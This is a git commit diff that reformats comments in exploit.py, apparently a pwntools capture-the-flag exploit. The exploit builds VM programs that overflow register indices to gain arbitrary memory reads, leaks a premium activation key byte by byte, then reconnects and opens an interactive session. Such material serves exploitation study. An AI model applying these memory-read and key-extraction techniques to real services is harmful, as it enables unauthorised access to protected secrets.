Reformat exploit.py.
This commit is contained in:
Johannes Maier
@@ -114,6 +114,7 @@ def exec_program(p: pwnlib.tubes.remote.remote, program: bytes) -> int:
|
|||||||
log.info(f"As char: {bytes([exit_code]).decode()}")
|
log.info(f"As char: {bytes([exit_code]).decode()}")
|
||||||
return exit_code
|
return exit_code
|
||||||
|
|
||||||
|
|
||||||
def extract_premium_key():
|
def extract_premium_key():
|
||||||
offset_saved_rip_to_activation_key = 0x396d
|
offset_saved_rip_to_activation_key = 0x396d
|
||||||
|
|
||||||
@@ -122,21 +123,22 @@ def extract_premium_key():
|
|||||||
p = connect(b"", False)
|
p = connect(b"", False)
|
||||||
i = 0
|
i = 0
|
||||||
while i < 0x80:
|
while i < 0x80:
|
||||||
program = instr_r(Opcode.ADD, Register.K, Register.A) # arbitrary
|
# mov r8, rsp
|
||||||
program += instr_i(Opcode.LOADI, Register.A, 0x90909090)
|
program = load_rsp(Register.G)
|
||||||
|
# mov rcx, r8 (rcx, because we overflow the highest bit of register_id[r8])
|
||||||
program = load_rsp(Register.G) # mov r8, rsp
|
program += instr_r(Opcode.ADD, Register.A, Register.G)
|
||||||
program += instr_r(Opcode.ADD, Register.A,
|
# add r9, [rcx]
|
||||||
Register.G) # mov rcx, r8 (rcx, because we overflow the highest bit of register_id[r8])
|
program += arbitrary_read(Register.H, Register.C)
|
||||||
program += arbitrary_read(Register.H, Register.C) # add r9, [rcx]
|
# mov rdx, r9 (rdx, because we again overflow the highest bit of register_id[r9])
|
||||||
program += instr_r(Opcode.ADD, Register.C,
|
program += instr_r(Opcode.ADD, Register.C, Register.H)
|
||||||
Register.H) # mov rdx, r9 (rdx, because we again overflow the highest bit of register_id[r9])
|
# add rdx, offset_saved_rip_to_activation_key
|
||||||
program += instr_i(Opcode.ADDI, Register.D,
|
program += instr_i(Opcode.ADDI, Register.D, offset_saved_rip_to_activation_key + i)
|
||||||
offset_saved_rip_to_activation_key + i) # add rdx, offset_saved_rip_to_activation_key
|
# add r10, [rdx]
|
||||||
program += arbitrary_read(Register.I, Register.D) # add r10, [rdx]
|
program += arbitrary_read(Register.I, Register.D)
|
||||||
program += instr_r(Opcode.ADD, Register.D,
|
# mov rbx, r10 (rbx, because we again overflow the highest bit of register_id[r10])
|
||||||
Register.I) # mov rbx, r10 (rbx, because we again overflow the highest bit of register_id[r10])
|
program += instr_r(Opcode.ADD, Register.D, Register.I)
|
||||||
program += instr_r(Opcode.COPY, Register.A, Register.B) # mov rax, rbx
|
# mov rax, rbx
|
||||||
|
program += instr_r(Opcode.COPY, Register.A, Register.B)
|
||||||
|
|
||||||
exit_code = exec_program(p, program)
|
exit_code = exec_program(p, program)
|
||||||
if exit_code == 0:
|
if exit_code == 0:
|
||||||
@@ -149,9 +151,11 @@ def extract_premium_key():
|
|||||||
p.close()
|
p.close()
|
||||||
return premium_key
|
return premium_key
|
||||||
|
|
||||||
|
|
||||||
context.log_level = 'warn'
|
context.log_level = 'warn'
|
||||||
|
|
||||||
premium_key = extract_premium_key()
|
premium_key = extract_premium_key()
|
||||||
|
|
||||||
p = connect(premium_key, True)
|
p = connect(premium_key, True)
|
||||||
|
|
||||||
p.interactive()
|
p.interactive()
|
||||||
|
|||||||
Reference in New Issue
Block a user